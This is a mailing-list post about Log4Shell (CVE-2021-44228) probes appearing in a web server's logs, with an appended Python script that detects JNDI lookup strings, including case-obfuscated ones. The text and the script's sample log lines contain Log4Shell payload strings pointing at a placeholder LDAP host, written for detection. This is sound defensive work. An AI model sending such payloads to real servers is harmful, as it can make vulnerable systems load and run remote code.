[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228

Steven Schweda sms.antinode at gmail.com
Thu Dec 16 21:04:17 EST 2021


   I see that my Web server log has started to collect a variety of
"${jndi:ldap:" stuff, some of which is encoded to avoid simple
recognition ("${${lower:j}${lower:n}${lower:d}i:").  Interesting that
because the vulnerability is in the logging, the payload can appear in
the referrer string, not necessarily in the request URL itself.  What a
world, what a world...
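A detection sketch for the log entries described in the post above, added here as an example and not part of the original message: it percent-decodes each field, unwraps `${lower:...}`/`${upper:...}` wrappers, and checks the request, referrer and user-agent fields alike. It assumes Combined Log Format; the sample lines, addresses and the `example.invalid` host are constructed.

```python
import re
from urllib.parse import unquote

# Assumed Combined Log Format:
# host ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# ${lower:x} / ${upper:x} wrapped around a literal (no lookup nested inside)
CASE_LOOKUP_RE = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)


def normalize(value):
    """Percent-decode, then unwrap case lookups innermost-first until stable."""
    value = unquote(value)
    while True:
        unwrapped = CASE_LOOKUP_RE.sub(lambda m: m.group(1), value)
        if unwrapped == value:
            return value.lower()
        value = unwrapped


def suspicious_fields(line):
    """Return the names of log fields holding a JNDI lookup after normalizing."""
    m = LINE_RE.match(line)
    if not m:
        return []
    return [name for name in ("request", "referer", "agent")
            if "${jndi:" in normalize(m.group(name))]


# Constructed sample entries (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Dec/2021:20:01:02 -0500] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [16/Dec/2021:20:03:40 -0500] '
    '"GET /?x=$%7Bjndi:ldap://example.invalid/a%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.12 - - [16/Dec/2021:20:05:09 -0500] "GET / HTTP/1.1" 200 512 '
    '"${${lower:j}${lower:n}${lower:d}i:ldap://example.invalid/a}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hits = suspicious_fields(entry)
        if hits:
            print(entry.split()[0], "->", ", ".join(hits))
```

Only the case-lookup wrapping quoted in the post is unwrapped here; a plain substring search for `${jndi:` would miss the third sample line.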


